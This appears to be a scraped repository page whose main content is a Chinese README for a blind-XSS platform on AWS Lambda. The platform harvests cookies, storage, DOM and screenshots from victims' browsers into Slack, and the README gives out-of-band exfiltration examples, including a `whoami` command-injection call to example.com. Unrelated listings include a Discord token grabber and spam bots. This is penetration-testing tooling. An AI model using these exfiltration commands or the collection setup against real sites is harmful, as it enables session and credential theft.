The AWS Lambda Serverless Blind XSS App

Related tags

Third-party APIs Wrappersass
Overview

Ass

The AWS Lambda Serverless Blind XSS App

利用VPS配置XSS平台太麻烦了,如果利用AWS的Lambda那不就是一个域名的事情么?剩下的环境配置、HTTPS证书、隐私性、VPS续费都不用管了, 所以根据xless重写了Lambda平台的XSS,利用slack机器人通知的方式代替邮件或者短信

XSS有四个URL可用,部署的时候建议修改不同的地址:

⚠️ 准备工作

  • AWS账号
  • Slack账号,包括一个slack App的通知机器人和上传图片需要的Auth Token
  • 自定义域名(可选)

🚀 部署

Slack

创建Slack的App,创建之后点进APP获取webhook和Token, webhook使用来通知机器人,Token可以使用xoxb开头的OAuth token,用于上传图片:

slack.png

AWS Lambda

部署Lambda

修改app.pyToken,Bot为你自己的信息:

virtualenv venv -p python3
. venv/bin/activate
sls plugin install -n serverless-wsgi
sls plugin install -n serverless-python-requirements
sls deploy #部署到aws
sls wsgi serve #本地测试
绑定自定义域名

首先在域名提供商更改ns的地址,使用Route 53服务管理域名,设置自定义域名步骤:how-to-edge-optimized-custom-domain-name,总结来说如下:

  1. 在API Gateway增加自定义域名,选择 Edge-optimized,在API映射选择创建好的lambda函数
  2. 为域名配置ACM证书
  3. 配置好之后得到一个*.cloudfront.net格式的域名
  4. 在Route 53设置cname别名,cloudflare家不支持

📨 收集的信息

  • Cookies
  • User-Agent
  • HTTP Referrer
  • Browser DOM
  • Browser Time
  • Document Location
  • Origin
  • LocalStorage
  • SessionStorage
  • IP Address
  • Screenshot

xss.png

📡 Out-of-Band (OOB)

OOB场景1

在网站插入JS获取敏感信息传输到远程服务器,注意使用JSON格式:

http https://example.com/msg "UserName=admin" "Password=admin"  -v

oob

OOB场景2

命令执行外带到远程http服务:

http https://example.com/404/`whoami`

oob

TODO

  • 每次需要改JS的时候需要重新部署Lambda
Owner
cocokey
cocokey
GitHub Repository
You can connect with Sanila Ranatunga using this bot😉😉

Sanila-Ranatunga-s-Assistant-Bot You can connect with Sanila Ranatunga using this bot 😉 😉 Reach me on Telegram Sanila's Assistant Bot What is Telegr

Sanila Ranatunga 5 Feb 01, 2022
a list of disposable and temporary email address domains

List of disposable email domains This repo contains a list of disposable and temporary email address domains often used to register dummy users in ord

1.6k Jan 08, 2023
Fetch Flipkart product details including name, price, MRP and Stock details in general as well as specific to a pincode

Fetch Flipkart product details including name, price, MRP and Stock details in general as well as specific to a pincode

Vishal Das 6 Jul 11, 2022
Python API client library for phpIPAM installations

phpypam: Python API client library for phpIPAM installation As we started to develop phpipam-ansible-modules we used an existing python library for ph

codeaffen 3 Aug 03, 2022
a simple quant trading bot with CLI interface

shepherd a simple quant trading bot with CLI interface CLI shell command docs coming soon after I brush up the code and add more features :) Minimal R

m00n 0 Jun 06, 2022
Touca SDK for Python

Touca SDK For Python Touca helps you understand the true impact of your day to day code changes on the behavior and performance of your overall softwa

Touca 12 May 18, 2022
数字货币动态趋势网格,随着行情变动。目前实盘月化10%。目前支持币安,未来上线火币、OKEX。

数字货币动态趋势网格,随着行情变动。目前实盘月化10%。目前支持币安,未来上线火币、OKEX。

幸福村的码农 98 Dec 27, 2022
⛑ REDCap API interface in Python

REDCap API in Python Description Supports structured data extraction for REDCap projects. The API module d3b_redcap_api.redcap.REDCapStudy can be logi

D3b 1 Nov 21, 2022
Discord Token Creator 🥵

Discord Token Creator 🥵

dropout 304 Jan 03, 2023
A simple Discord Token Grabber sending the new token if the victim changes his password.

💎 Riot 💎 Riot is a simple Discord token grabber written in Python3 running in background and executing when the victim start their computer. If the

Billy 66 Dec 26, 2022
A better rename and convert bot with upload mode option and Auto detection

A better rename and convert bot with upload mode option and Auto detection

Code X Mania 2 Nov 09, 2021
A simple telegram voting bot based on the python-telegram-bot api.

A simple telegram voting bot based on the python-telegram-bot api. *To make it more easy to use, I might make a C++ code in the future so you don't ha

3 Sep 13, 2021
A QQ(Tencent) robot created by go-cqhttp & nonebot2

绘梨花(胶布)Bot|ErikaBot ✨ 基于NoneBot2的绘梨花多功能 Bot ,自用 ✨ 快速开始 参考go-cqhttp项目文档,配置好机器人的相关设置,以及反向ws客户端 参考nonebot2项目文档,添加必要的.env相关设置 安装本项目相关的依赖库(依赖清单) git clone本

10 Aug 09, 2022
Telegram Group Management Bot based on phython !!!

How to setup/deploy. For easiest way to deploy this Bot click on the below button Mᴀᴅᴇ Bʏ Sᴜᴘᴘᴏʀᴛ Sᴏᴜʀᴄᴇ Find This Bot on Telegram A modular Telegram

Mukesh Solanki 5 Nov 17, 2021
Discord spam bots with multiple account support and more

Discord spam bots with multiple account support and more. PLEASE READ EVERYTHING BEFORE WRITING AN ISSUE!! Server Messages Text Image Dm Messages Text

Mr. Nobody 6 Sep 14, 2022
Asad Alexa VC Bot Is A Telegram Bot Project That's Allow You To Play Audio And Video Music On Telegram Voice Chat Group.

Asad Alexa VC Bot Is A Telegram Bot Project That's Allow You To Play Audio And Video Music On Telegram Voice Chat Group.

Dr Asad Ali 6 Jun 20, 2022
Tracks how much money a profile has in their bank and graphs it, as long as they enable the bank api

Tracks how much money a profile has in their bank and graphs it, as long as they enable the bank api. (you could really use this to track anything from the hypixel api)

1 Feb 08, 2022
Make your Pass (sanitaire) Fun Again

Make Your Pass (Sanitaire) Fun Again Customize your Pass Sanitaire (French name for EU digital Covide19 Certificate) with colors and images, thus make

101 Dec 01, 2022
This is a Discord script that will provide a QR Code to your scholars for Axie Infinity.

DiscordQRCodeBot This is a Discord script that will provide a QR Code to your Axie Infinity scholars. Setup Run Ubuntu on AWS ec2 instance Dowloads al

ZracheSs | xyZ 24 Oct 05, 2022
A community made discord bot coded in Python and running on AWS.

Pogbot Project Open Group Discord This is an open source community ran project. Join the discord for more information on how to participate. Coded in

Project Open Group 2 Jul 27, 2022